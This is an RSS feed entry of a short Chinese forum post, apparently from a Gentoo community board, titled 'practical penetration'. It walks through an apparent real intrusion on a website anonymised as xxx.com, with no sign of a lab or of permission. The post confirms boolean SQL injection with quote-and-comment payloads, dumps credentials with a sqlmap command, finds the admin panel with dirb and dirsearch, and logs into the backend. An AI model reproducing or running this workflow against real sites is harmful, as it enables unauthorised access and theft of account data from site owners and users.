<![CDATA[Gentoo中文社区 / 实战渗透]]> http://www.gentoo-zh.org/viewtopic.php?id=720 Sat, 14 Oct 2023 13:35:20 +0000 FluxBB <![CDATA[实战渗透]]> http://www.gentoo-zh.org/viewtopic.php?pid=832#p832 通过信息收集找到一个网站xxx.com,发现有一个地方有传入参数,测试一下是否有注入。
www.xxx.com/se?cid=3'   显示页面不正常
www.xxx.com/se?cid=3'--+  显示页面正常   存在布尔注入。

使用sqlmap工具注入。
sqlmap -u "url" -D 数据库名 -T 表名 -C 列名 --dump

得到账号密码后,进行目录扫描。
dirb url
dirsearch -u url
得到网站后台路径
https://www.xxx.com/system/main.php
成功登录后台。

]]> Sat, 14 Oct 2023 13:35:20 +0000 http://www.gentoo-zh.org/viewtopic.php?pid=832#p832